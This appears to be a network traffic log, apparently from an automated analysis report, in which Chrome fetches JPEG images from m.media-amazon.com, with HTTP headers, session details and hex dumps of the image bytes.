                                                                                                                                                                                          X-Amz-IR-Id: 5efaf52b-28f2-4af2-b27c-8e025ddc929c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 18 Jul 2016 08:04:59 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 04 Nov 2044 03:42:34 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2155364
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:13 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000144-IAD, cache-nyc-kteb1890077-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 87 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f2 cc bc 6a d7 ee 65 de f1 3e 15 eb
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6je>
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 7d ba 4b 26 8e bc 5f 11 0f 3a 04 1f 3a 00 00 00 00 00 73 a0 00 21 c0 33 8f 9c 45 ca af 17 63 88 ba 35 d8 9b 04 45 95 c0 46 4d 44 5b 5c 70 57 97 55 58 a3 4d d6 f6 d8 63 97 b2 71 9d 7a 8a b5 b5 82 0b 89 fa f6 d3 92 32 e2 bb b1 39 71 a1 d7 6b 9a 2d 99 0c a7 53 55 00 00 00 00 00 00 00 00 00 00 00 00 03 9d 28 44 42 cc c2 5c 44 c2 cb c1 df 54 54 44 94 55 b5 24 dd d5 26 f8 53 52 70 96 cb b9 c0 18 74 1c 36 4d 92 8d 39 5d 92 3e b7 f2 86 b1 9a 3e 9a 97 a5 dc f9 53 e8 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 71 1e dc 6c 4b f8 6b a3 1b 05 29 09 7d 51 ac 1d 34 ba 96 99 44 e5 63 6b 58 a9 1e c9 70 1b 80 42 9f 85 90 8f d1 42 a9 c8 2a 99 ed 87 a4 b5 9f 12 7a 6b 98 6c 62 12 6f 9d 68 00 20 00 00 00 00 00 00 79 bf 4e f0 4d 3a 7d fb 7b f9 e9 f4 26 75 98 01 3a b9 0e
                                                                                                                                                                                          Data Ascii: }K&_::s!3Ec5EFMD[\pWUXMcqz29qk-SU(DB\DTTDU$&SRpt6M9]>>S7qlKk)}Q4DckXpBB*zklboh yNM:}{&u:
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 76 7e 93 74 b3 86 db 5a 96 3a 7d 23 df f5 fd 18 cb a8 7a 4e 1e 9d 33 dd f4 ab 85 01 de c0 8b 50 f8 8e f1 bb 77 83 bc db 1b b7 2a eb b8 e6 b6 21 f0 15 f0 c7 bc e9 bc 7d 2e ff 00 27 44 c7 e9 e8 2e 96 52 f5 fd a7 a2 ba 2e 92 e1 2c a5 eb c6 ea a8 7b 7e ad a3 7a fb bc ce 66 26 39 11 34 c3 f7 2b 96 78 69 89 c1 c7 7b 65 f7 ad 03 2f a9 e2 15 59 5b 81 a3 40 95 56 06 a3 56 ba 72 bb ec ad 6f 01 60 4c 76 1b 66 82 e6 bc b6 48 da d3 4e 1a cb 2c 62 06 18 88 d8 50 49 d0 6e 70 6c 62 bb 5b 13 85 e7 f7 73 c5 ce 11 22 7d 57 9f 0e f1 6c f1 31 38 86 93 a2 55 96 12 07 9d 68 16 9a 90 05 0b 80 12 f4 72 55 78 80 4d f8 5b 1b 79 cf b7 4b fe 5a e5 83 b3 41 38 2f 9b 65 b4 2d dd 9f 57 a0 a9 6a 72 bc 33 5c 00 e9 3b d6 1f b1 a4 04 f8 4d b3 53 f0 ae c6 9c 36 9d 94 88 57 31 2b d8 00 96 0c
                                                                                                                                                                                          Data Ascii: v~tZ:}#zN3Pw*!}.'D.R.,{~zf&94+xi{e/Y[@VVro`LvfHN,bPInplb[s"}Wl18UhrUxM[yKZA8/e-Wjr3\;MS6W1+
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 4f 8c 1b 67 c6 7c 67 c6 1c 4c fb f3 c8 c1 c8 72 c7 26 59 8c 73 c4 af 4a a6 ac 9d 1d 02 de a4 af 46 8e 46 ed 15 2b a8 dd bd 34 c3 a3 63 be 9a 80 f5 97 9e 91 0d 96 22 d7 5d 56 de aa a3 48 87 66 7d 2a ef 45 27 48 bf 33 35 7a 75 ab 38 7a c2 d7 53 41 a7 53 54 ba b0 3a 38 7a 2a dd 65 60 69 53 ae 2b 94 e9 eb 74 16 fb 04 13 3c cc c7 2c 4f 1f c0 38 85 8a 53 09 66 c0 e2 51 ab 34 60 4e ba e1 95 2d d6 35 9b f2 97 28 4e 9b fa 93 bc bc a3 75 6c 2c 5a b5 2e 82 2e a7 6b 07 54 d5 15 af a7 2d b9 6c c9 83 52 02 04 23 88 38 22 1d 46 55 44 6d 5e 77 19 eb 4f da 2e a9 93 66 3d e0 72 c7 b3 70 83 13 0b 3e 31 76 c5 db 17 6c f8 4c 88 1c 4e a4 ea 88 2e 9d 49 d4 9d 59 d5 9b f1 37 cd eb 37 24 6d 93 15 c2 95 cd 89 36 57 3a 6b 0d 62 61 61 c4 ed 04 f3 31 ec aa be a3 6d 0c 3c 75 86 93 46
                                                                                                                                                                                          Data Ascii: Og|gLr&YsJFF+4c"]VHf}*E'H35zu8zSAST:8z*e`iS+t<,O8SfQ4`N-5(Nul,Z..kT-lR#8"FUDm^wO.f=rp>1vlLN.IY77$m6W:kbaa1m<uF
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: c0 62 c4 76 46 ff 00 20 9d 40 d5 58 39 08 9e 5e 38 cc b5 f7 06 c4 55 ed bb 95 7a 72 9b 18 f8 95 de df 18 ce d6 7d e0 f6 0f 69 e4 3b 10 62 9d c3 22 db 36 45 18 f1 c2 75 3d 0a f3 05 a3 5a 1e 9b 01 c9 c4 b1 4a 76 1a 0e 20 8a 3a 6e 1d 1b c1 d4 a2 fc 88 74 b5 df 6d b8 2f 91 ac b9 5d 13 1e 1f 92 fe 63 78 32 cf a3 72 ff 00 b6 90 0c e0 4d 9d 88 84 75 10 40 3f 9c f6 ef 0f 7f 9c fb 00 26 9f b2 80 be a3 a2 ca 4d bf 17 96 af 57 70 85 48 01 5b 51 a6 0c 77 01 48 af 22 23 ee 68 3c e4 b9 ce d3 1f f0 60 8b fe b1 fc 19 8f c4 f1 1f eb 50 94 0f 94 3d fd eb 58 09 82 cb 83 ed c7 b3 be 67 99 42 0c ef 35 59 bd 55 85 d6 8a d4 b3 28 ae bf 99 03 7b 96 87 b0 39 6a cd 8f 91 7a b2 0d d1 ae cf 80 91 47 e4 dd f5 68 f6 f4 f1 93 70 42 60 b4 58 c3 19 8c fe 66 c6 75 ae 2e 9c d1 86 f7 8e e4
                                                                                                                                                                                          Data Ascii: bvF @X9^8Uzr}i;b"6Eu=ZJv :ntm/]cx2rMu@?&MWpH[QwH"#h<`P=XgB5YU({9jzGhpB`Xfu.
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 69 36 3d 09 b2 33 4b 35 2e 9b e9 29 b5 6b 2c 96 7f 3f 1f b2 53 c2 f1 8c 3e 70 47 ce 0a ec 70 53 7c 14 5c e7 e9 ed 9e 81 cf 4f 83 82 b7 19 e2 03 39 51 8b 2a 67 91 30 4c 06 0b 2b 9f 9f 91 c7 da 58 0b fc 83 17 68 ee 26 d7 f4 3d 87 3f 8f 3c b9 dc f9 c3 e7 69 ce dc ec cf 16 78 b0 c1 86 13 9e 23 8b 1c a7 e1 6b d7 31 a7 f2 23 ec 13 0a 67 ae a7 f3 eb 2e 78 e2 e0 9c e2 1e d2 73 88 b8 24 3c f0 a4 6f 2b 0e a4 a5 f3 91 6f a9 4d 2a 45 1b ec ea c6 8a ec fb 5a c8 a8 d8 db ba 48 aa e7 d6 4c f0 20 c0 a0 67 19 c6 0c f2 aa 0f e5 ee c7 fd 7b a9 9e e8 c5 64 fe b8 4e 79 c0 10 2f 01 d6 36 8d a3 27 59 53 b9 9b 16 8d 48 e5 f3 46 da da 4e 58 bf e9 b4 46 0d 76 bc 0e 0f b9 1f 00 67 b9 16 0b 31 9f c0 ce 30 47 96 d3 e4 1c 25 46 79 07 f4 66 23 8c 57 ee 52 53 d8 7c f6 5b 3d 86 cf 61 b3
                                                                                                                                                                                          Data Ascii: i6=3K5.)k,?S>pGpS|\O9Q*g0L+Xh&=?<ix#k1#g.xs$<o+oM*EZHL g{dNy/6'YSHFNXFvg10G%Fyf#WRS|[=a
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 62 40 34 64 9d a4 6e cd e3 79 2c 9b 3d 45 29 59 69 37 45 9d 9e b8 36 2d 07 7b 55 dc 72 af da 48 f2 ad f9 62 75 44 e4 af 48 81 15 3d 70 2b a6 eb 46 0d a9 27 c5 a5 12 d8 6b 21 22 11 dd 69 01 b2 2b 99 64 9a 3b eb 3c 22 31 c9 2d 95 98 1b 15 ec 6c 74 3e 37 8c e1 54 b6 03 fd e5 6e 5d 61 8f a1 9f 96 79 be 02 73 e0 28 12 4f 69 a7 7e ec 8f d5 d5 b2 d7 20 b3 f5 ea 9c dc 41 15 18 73 91 28 3d 4f 33 2f a7 d3 3f c8 a2 f8 26 d5 d5 9a 73 22 c1 ce 56 ea ab 27 23 ca a5 9e a9 1a ca 51 83 00 c0 80 47 89 5f e0 0c 1e 3b e7 aa 33 d6 19 eb 8c f5 7f f3 d4 39 ea 1c d9 cf 4d 8e 1a ed 9e dd b3 db 13 86 a3 e4 0e 7a 68 f6 cd e3 c4 49 ec 02 31 3a c1 4c ff 00 7e d5 06 0a d1 e7 a7 18 c3 d7 3b 0c ec 33 be 7a 83 3d 41 9e ae 09 30 38 cf b3 19 87 f4 1b c1 93 3b fc 81 9d f0 30 ce d8 7f d1 5c
                                                                                                                                                                                          Data Ascii: b@4dny,=E)Yi7E6-{UrHbuDH=p+F'k!"i+d;<"1-lt>7Tn]ays(Oi~ As(=O3/?&s"V'#QG_;39MzhI1:L~;3z=A08;0\
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: f1 34 bc 76 c7 a4 3a 5e f6 72 b7 46 09 bb f7 8c 02 69 dc a0 d1 a4 cd d6 87 15 dd 74 79 d4 21 30 53 05 03 d3 bb 0a c1 72 66 18 94 cb af 6d 5f ee 31 84 9a 09 96 87 fd 27 f2 83 99 db 33 60 7b 89 f6 4c bb 6b c2 ed 32 3e f1 81 f7 43 a3 40 60 73 cd 02 d3 aa 1d 14 c1 8e 5e e9 98 0e e9 aa 17 99 12 c4 6c 4c 17 d2 5e e9 92 1c f5 50 53 25 62 50 3d 27 49 03 3c 94 47 8e a3 fc bd d7 67 ff 00 24 ff 00 b5 3f ed 4d 74 99 38 39 07 1c 68 b9 41 aa ec e3 8f 53 fa 4f 17 26 9a 6b 55 d2 e0 7d 91 37 9b 74 7c f2 4d b5 ab d1 21 a9 c3 04 db 5a d8 fb cd 88 79 26 da f9 b9 36 d7 cd c9 b2 e0 43 eb 04 d9 71 4d b5 f3 72 24 bc 19 ec 72 31 06 3b 1c b4 c1 4e bb 02 ee cd 12 e2 f4 d1 e0 a2 31 f7 5d 9c 71 c9 0e 25 44 75 bd a3 35 56 10 79 84 33 41 c5 99 b2 68 a6 0a c1 57 93 6b 85 ac 16 9c 3d 57
                                                                                                                                                                                          Data Ascii: 4v:^rFity!0Srfm_1'3`{Lk2>C@`s^lL^PS%bP='I<Gg$?Mt89hASO&kU}7t|M!Zy&6CqMr$r1;N1]q%Du5Vy3AhWk=W
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: f2 fa 76 7c de 9a 71 74 9d c5 4f 15 8a a3 96 3c df 13 3e 56 1e 9e 1f 3c e4 81 66 73 b4 13 bb e8 fe ec 10 70 67 1a a8 11 44 4f fb 81 97 a8 b4 d0 df aa e4 e3 b5 bf da ab d6 28 4a 8f 72 37 43 d1 26 10 42 6b c2 11 04 e0 e7 34 0a 6a f6 e7 2b db 53 45 c6 8f 82 63 ed e8 1f 65 7a ec 27 85 54 90 90 8d 72 b3 e7 a2 8e df 6e aa 50 7d 98 0b 5a bb 18 17 c0 bf 65 57 78 9d d8 e4 f5 33 2d fe c8 74 40 1a 85 42 82 fe e5 02 cb 02 34 21 98 f0 46 83 7b c2 0b 12 b0 69 7c 7a c4 f3 69 c1 0f 45 06 40 74 20 fc 57 bf 57 32 6c 2e 58 c4 a1 78 e0 26 85 d2 85 7d 14 ef b5 b5 77 47 13 f8 b3 3d 10 98 c9 50 aa 36 cf 9b dd b9 61 e5 66 2b 62 96 38 e5 66 36 6e 8d 9d d6 5d 37 3b 48 94 d1 6b 33 0d 3a cf 65 18 ef b2 74 08 ef f9 04 c7 6e 38 43 e5 14 1f 2f 9b 11 87 08 41 1a bd f8 62 85 d9 c6 85 34
                                                                                                                                                                                          Data Ascii: v|qtO<>V<fspgDO(Jr7C&Bk4j+SEcez'TrnP}ZeWx3-t@B4!F{i|ziE@t WW2l.Xx&}wG=P6af+b8f6n]7;Hk3:etn8C/Ab4
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: cb 35 a6 e5 7f 73 12 d1 2d c7 b4 60 fe b1 29 c2 97 93 5a ef 35 60 13 f7 88 63 6b 55 ed c7 bc 62 a6 cd 06 2b 68 a3 cf 2d 6d 99 76 fc ee 7d fe e6 5f 3c f7 4d 17 bf 1e 48 61 73 5d 6e f7 bf df 42 54 3a 23 eb ef 29 0e 6f e6 7f 94 94 16 0e 7a 6b 98 d1 2b 6a 6f db 52 64 93 f9 32 6f bc cb 50 95 c0 69 d9 5b ed 04 5d 6e 4f 0c 15 ba 34 78 72 25 85 f3 1b 58 7b ab 3f 10 09 a0 00 7a 62 35 d9 a3 eb 8d bd 25 e5 a5 85 f7 70 43 3a 24 47 d6 7e b1 43 5f ab 2c b5 c7 3a 76 40 26 86 9e b9 be f7 cc 75 38 3f 07 bb 5f 79 6f dd a1 3c 7c 3e cc 3e c1 05 fd 6c cb 5f 4d 97 14 a5 b5 6f 89 53 38 67 e5 e7 d8 fc 71 32 31 7e 02 40 cb 4d 3d e8 b6 c1 97 e0 ed da 59 6d 15 db b8 9a 30 57 72 96 99 5e cd d3 cc b9 99 52 ea 9b 83 7e bc 37 35 5f 39 3f db 25 e6 83 4b 90 6b a8 6e 00 f4 94 12 0a 5c e8
                                                                                                                                                                                          Data Ascii: 5s-`)Z5`ckUb+h-mv}_<MHas]nBT:#)ozk+joRd2oPi[]nO4xr%X{?zb5%pC:$G~C_,:v@&u8?_yo<|>>l_MoS8gq21~@M=Ym0Wr^R~75_9?%Kkn\


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          108192.168.2.1649843151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:13 UTC445OUTGET /images/M/MV5BNTgxOGZjYzMtMDkzOS00ZTA5LTg3MmUtM2IyMWRiMzQwYjMxXkEyXkFqcGdeQXVyNjMxODMyODU@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 34350
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: a429f27f-4ebb-4dce-82e1-5d238de4edf1
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 16 Jun 2016 18:40:09 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Mon, 10 Oct 2044 00:25:28 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 920875
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:13 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200078-IAD, cache-nyc-kteb1890053-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c7 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 00 02 08 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e8 a7 5a ec 96 87 bb 6a a5 a3 dd d7
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6Zj
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: a9 57 69 ce 50 d7 85 76 3d 2e 93 80 21 12 ae 64 37 29 f4 94 35 1e 1b b1 0f 61 a0 35 35 ab 55 5c 0d 30 26 b3 47 5e 6e ae f7 6a b0 ca d4 54 b4 5d ec a1 dd 6c a5 2e 0a c5 ea ed 1e 41 6d 74 56 6b 20 4e 29 2f 5b d6 91 d2 cc 76 04 dd 67 4e e2 ca de a0 36 42 8f 15 78 32 a9 19 20 de 02 40 90 3d 10 42 cf 05 ce 7a ea b0 2b 51 ce a2 bd 37 05 09 6e 15 14 70 6c fa 33 67 3e 67 69 92 41 1f 0a 10 11 62 e5 ae c4 d4 04 ab e8 e5 92 c7 5e a6 17 f2 32 57 43 a4 ee 16 2e 08 c8 4f 37 19 f1 ec f2 df 07 26 3a 1d 40 58 55 6d b4 62 76 75 31 a4 83 2b 15 9d a0 8b 6a ea f1 90 9a 76 9a cd 00 47 30 8c c5 84 c9 fb 48 79 82 8e 62 78 74 95 d5 03 29 5b 86 95 0e 8f 4e 2a d5 d1 73 6b 3d 66 8b 16 65 20 53 ea de bc 93 a8 79 a4 59 9c af 4c 86 7a ca b9 49 d2 c5 61 0b 62 0b 3b 91 55 cb d8 05 ec 2d
                                                                                                                                                                                          Data Ascii: WiPv=.!d7)5a55U\0&G^njT]l.AmtVk N)/[vgN6Bx2 @=Bz+Q7npl3g>giAb^2WC.O7&:@XUmbvu1+jvG0Hybxt)[N*sk=fe SyYLzIab;U-
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: af c4 f6 ce 74 df 69 7b e6 33 0a 2a f6 05 e0 c9 38 06 b3 5a a4 22 04 2d d3 23 49 4f 5c 32 2a 92 77 78 bd d0 10 32 69 65 20 50 97 a2 33 62 bb 98 43 76 88 5c 43 72 b7 35 a8 63 f3 18 d6 aa c5 12 c6 5d 3c d7 e0 bb a4 34 5a ca 43 d8 c7 c4 17 9b 93 59 55 61 a7 46 db d6 4e d7 80 d4 05 5d cc 59 47 33 14 43 3c b7 3b ea e8 af 33 33 4c 5c 75 07 a4 4a ab 2c d5 1f 44 03 c2 8a 5a 9f af 77 6a dc cc 54 95 fa 0f 7e 27 83 35 7b b3 6e 5a 95 a7 57 5d 22 29 56 bb 17 f4 95 27 8b 5a db a8 9e 57 0c d4 d6 39 f4 61 2b d8 1a 28 8f 9a 3d 29 14 64 c3 ca 2f cd 77 a8 49 9e d0 48 15 c1 7c 82 11 c6 cf cb 02 e1 8b da 71 3a 53 59 7a 4e d9 51 b1 2f 19 6e 56 4e f0 6a 7e ae 4d 44 2d 3b a0 3a 1c c2 d3 db 70 15 6b 5b 7f 4e 9a ad 4b 43 7e ee 7d 91 b0 06 b8 f1 2e 24 53 ad c7 09 e4 21 66 04 8b 6d
                                                                                                                                                                                          Data Ascii: ti{3*8Z"-#IO\2*wx2ie P3bCv\Cr5c]<4ZCYUaFN]YG3C<;33L\uJ,DZwjT~'5{nZW]")V'ZW9a+(=)d/wIH|q:SYzNQ/nVNj~MD-;:pk[NKC~}.$S!fm
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 6e ac d4 56 cf 2f 88 21 10 ae d0 da 6c 9f a3 65 28 ab 7b 69 3b 8b 57 43 74 6e 00 b1 94 d2 e9 b2 1a b6 8b b2 9b 4e a3 21 69 08 a0 71 51 72 eb d2 eb fb af 5a 5f d5 bd f9 02 b5 1b d7 b7 c2 ac 73 1b ab 79 23 36 f3 22 ee 49 20 ec 4a 9b 23 b8 80 c0 e5 0e c2 00 6a d3 a5 13 23 5b bc 7a 6c ac c5 6a da c9 6d f9 ea ee a9 cb 3e ad 10 38 4f 35 e6 bb 6b fd 29 ac 56 56 dc 45 84 42 92 04 4f 14 f6 2a 5b 75 41 1a c7 c2 f5 b3 b8 64 6f 4f 31 38 e6 ae 75 27 97 84 d9 9e 6a 39 bb 8b d9 92 36 6b 77 06 a5 d3 a2 b9 1d c8 e7 b2 7b 7e 59 43 5e 44 d9 d3 a0 66 c8 68 6d a1 b5 34 b2 06 38 15 3d c2 40 32 fe ae 7b af ec 47 a4 a9 f9 4c 91 2c 7c 2b 30 50 49 b9 d7 71 c4 53 5e 4a ff 00 61 2b a1 cd 69 d7 65 f0 a7 15 71 7d 72 8e d8 fe 6a 71 5a 6d e4 97 1f 63 c5 49 ad cd fa d3 2f de 7e 24 ad 49
                                                                                                                                                                                          Data Ascii: nV/!le({i;WCtnN!iqQrZ_sy#6"I J#j#[zljm>8O5k)VVEBO*[uAdoO18u'j96kw{~YC^Dfhm48=@2{GL,|+0PIqS^Ja+ieq}rjqZmcI/~$I
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 77 28 49 4a f4 1b 3e 1d b3 d4 52 2d 5a 8d 89 93 d0 1c f4 d9 87 73 53 64 29 da 88 5d f6 8e c2 91 5a 85 a2 a2 6e ad 3c 61 45 7f 90 a9 53 7a b2 d4 27 2b 52 af 71 08 ab 79 b2 82 af 0b a0 e5 2b 75 49 4b 59 af f5 5b b1 e4 61 cd 2c 40 53 e0 8a 68 f3 cd 76 a8 41 5d 9a db 8a 8b e3 f2 2d d3 14 ab 56 f1 6e 38 a9 38 c0 a6 38 51 41 be 26 97 c1 a8 cf 14 7e cd 4c 33 56 10 f2 f2 74 d4 53 74 66 ac db f1 8a 23 3d 24 8f b3 25 73 9e 2d e1 ed 28 5a d4 be 82 90 71 41 71 47 f7 43 f5 d0 d1 5c d4 76 e1 4e 68 9a 66 ac 8a cd 6e ad d4 ca 69 ee 84 83 6a 9a c5 28 ab 48 37 64 95 01 3c 0f 97 96 e6 81 ac ed 14 2e 2a 4e 46 e1 9f dd 5b 0c 46 bd 2f db 11 35 58 bf dc 50 e9 a8 f1 db 35 67 b9 fe 55 e0 d5 ef ff 00 18 a1 d3 b5 48 78 e8 7c f4 dd 8a 69 68 c9 46 4a ee 50 39 a8 a0 62 6a e6 2f c4 f4
                                                                                                                                                                                          Data Ascii: w(IJ>R-ZsSd)]Zn<aESz'+Rqy+uIKY[a,@ShvA]-Vn888QA&~L3VtStf#=$%s-(ZqAqGC\vNhfnij(H7d<.*NF[F/5XP5gUHx|ihFJP9bj/
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: c6 52 b1 a2 a8 50 14 63 de 2a fd be 50 2d 4a 3b af 1c 75 7f 26 12 ad 57 09 42 be d5 1c 74 65 58 fc c4 8d 79 48 81 06 05 49 2e da 4d df bb 99 82 2b 54 c3 66 c3 51 ae 7c 98 f8 da 91 42 b0 0d a8 4f b0 57 d1 b1 52 23 79 51 75 18 e2 84 a2 4e 14 c2 c5 a9 72 07 01 83 72 28 7b 80 ab b9 f7 dd 05 16 8b ba 59 1a b5 23 81 56 e3 8a c5 44 94 80 ce 76 c7 1e 95 12 79 6b 1e 72 9e 99 a8 43 25 7a 5c 1d c9 7b 73 2c 00 0a dd 83 cd cf 3b 05 46 38 15 17 cd 65 15 04 bd d4 56 f7 5c 70 bb ba 4a 9b 98 56 d1 45 fc 07 c7 f8 b3 82 09 60 ac 18 64 67 a6 3d 97 77 1d 88 99 e9 2d c4 46 ac 47 f7 2b 53 ab 7f a8 a0 5f 3c 10 4c 91 ac a8 a0 00 07 41 8a f8 d6 c8 cd 4d 66 93 a9 5a b8 b4 6b 76 db 27 d9 cd 46 d5 6b fd c9 05 69 f3 6d 79 20 f7 11 b8 10 6d a5 f8 ec 66 b8 45 f3 ea 90 9c 02 3b 8a 41 89
                                                                                                                                                                                          Data Ascii: RPc*P-J;u&WBteXyHI.M+TfQ|BOWR#yQuNrr({Y#VDvykrC%z\{s,;F8eV\pJVE`dg=w-FG+S_<LAMfZkv'Fkimy mfE;A
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: c9 b2 d3 7b ea 24 3d 24 82 5d c6 b0 91 7c 9b 3f 93 80 94 56 b1 53 2b 1c 6d 5e e2 f1 5f 3a 2c f5 96 ff 00 28 a5 fd 30 ac f4 14 2b 5c fe d2 56 93 79 15 ba 38 7d 74 e4 c4 6b 54 fe d5 a5 6e 65 05 6a 5f fd 04 55 a5 47 fe 55 a7 5d fa 69 77 16 90 cb 2e e3 aa b0 96 e7 69 d0 e6 c3 bc 75 7f 67 6e 04 af 56 1f 5b 9a d2 2d 23 9c 39 7d 53 9b b4 ab 45 0b 7e e0 5a 77 73 22 c5 73 6a 6d ad 00 6b 5b 04 95 55 cf 46 4c d4 89 f1 38 e3 c1 83 25 46 ee 98 a3 6e ac 73 5e 9d 69 ad c5 76 02 9c d6 da 47 29 4a e1 ba ad 5d da 0b a4 da 7f 81 ab cd 33 d4 ec ab bd 37 d4 08 c5 5c 69 2b 30 8e 9f 4c dd 02 c1 56 7a 7b db b6 48 d0 80 56 c9 d1 d4 f6 ca 9d 39 04 fb e5 5d 27 b7 30 95 2f f4 be e3 bc c6 0d 2d 62 8d d2 93 43 64 65 35 7f a6 1b a7 de 2c 74 bf 4c fd c6 d3 f4 e6 b5 76 63 7f 69 ea 90 25
                                                                                                                                                                                          Data Ascii: {$=$]|?VS+m^_:,(0+\Vy8}tkTnej_UGU]iw.iugnV[-#9}SE~Zws"sjmk[UFL8%Fns^ivG)J]37\i+0LVz{HV9]'0/-bCde5,tLvci%
